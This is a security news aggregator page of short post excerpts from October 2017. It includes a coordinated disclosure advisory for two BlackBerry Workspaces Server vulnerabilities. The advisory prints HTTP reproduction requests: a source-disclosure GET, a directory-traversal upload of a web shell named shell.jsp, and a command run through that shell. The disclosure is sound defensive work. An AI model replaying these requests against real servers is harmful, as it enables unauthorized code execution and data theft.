Clean IT Up: Cyber Hygiene Controls Tips

October is national cybersecurity awareness month, and with the recent examples of hacks at Equifax and Sonic as well as the realization that 3 billion Yahoo accounts have been breached, we all are likely feeling a little dirty. So, I decided to share my perspectives on cyber hygiene. The dictionary defines hygiene as “conditions or […]

The post Clean IT Up: Cyber Hygiene Controls Tips appeared first on The State of Security.

The post Clean IT Up: Cyber Hygiene Controls Tips appeared first on Security Boulevard.

Women in Information Security: Katherine Teitler

Last time, I spoke with Tarah Wheeler, who is a technology and cybersecurity executive, entrepreneur, hacker, keynote speaker, scientist, and author. She’s also the author of Women in Tech: Take Your Career to the Next Level with Practical Advice and Inspiring Stories. This time I spoke to Katherine Teitler. She’s the director of content at […]

The post Women in Information Security: Katherine Teitler appeared first on The State of Security.

The post Women in Information Security: Katherine Teitler appeared first on Security Boulevard.

Partner Story: Discovering an AD Alternative

For small to medium businesses, Microsoft Active Directory is rarely the most cost-effective solution for identity management. That’s why IT consultants increasingly recommend JumpCloud’s Directory-as-a-Service® to their…

The post Partner Story: Discovering an AD Alternative appeared first on JumpCloud.

The post Partner Story: Discovering an AD Alternative appeared first on Security Boulevard.

20 Questions to Ask Yourself before Giving a Security Conference Talk

Ever sit through a security conference talk that made you shake your head? Ever wish the speaker had taken the time to verify that the talk would hit the mark? Whether or not you have, I’m guessing you might get a kick out of my latest DarkReading piece: https://www.darkreading.com/careers-and-people/20-questions-to-ask-yourself-before-giving-a-security-conference-talk/a/d-id/1330124. Hope you enjoy.

The post 20 Questions to Ask Yourself before Giving a Security Conference Talk appeared first on Security Boulevard.

The Threat Landscape Expands

An October to remember, and the month is only halfway done. So far, we’ve got Russian and North Korean spies, Swedish DDoS’ers, an evil software company that is about to go out of business, politicians that don’t understand encryption trying to regulate encryption and some of the most amazingly stupid things some otherwise bright and […]

The post The Threat Landscape Expands appeared first on Netswitch Technology Management.

The post The Threat Landscape Expands appeared first on Security Boulevard.

Cybersecurity: The Next 7 Years

The last five to seven years in Cybersecurity have been all about threat detection within conventional IT networks. The platforms have evolved from simple SIEMs with Anti-Virus protection to advanced SIEMs bolstered by behavioral analytics, active threat intelligence and threat management and recently to managed detection and response capabilities grounded in artificial intelligence and machine […]

The post Cybersecurity: The Next 7 Years appeared first on Netswitch Technology Management.

The post Cybersecurity: The Next 7 Years appeared first on Security Boulevard.

Russia Witch-Hunt Attacks Wrong Target

According to headlines, we just learned that “Russia hacked NSA documents with aid from antivirus software.”  What actually happened was that a hacking group alleged to be Russian bad guys somehow managed to hack through a vulnerability in Kaspersky anti-virus software to steal sensitive information on a home PC. The headline should have read ”NSA […]

The post Russia Witch-Hunt Attacks Wrong Target appeared first on Netswitch Technology Management.

The post Russia Witch-Hunt Attacks Wrong Target appeared first on Security Boulevard.

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 – CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 – BlackBerry acknowledges receiving our report.
  • 5/16/17 – BlackBerry confirms that an investigation has started.
  • 6/6/17 – BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 – BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 – BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 – BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 – BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 – GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later

The post Remote Code Execution in BlackBerry Workspaces Server appeared first on Security Boulevard.

A week in security (October 9 – October 15)

A compilation of notable security news and blog posts from Monday, October 9 to Sunday, October 15. We presented our quarterly report, won security awards, and lots more.

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.

The post A week in security (October 9 – October 15) appeared first on Security Boulevard.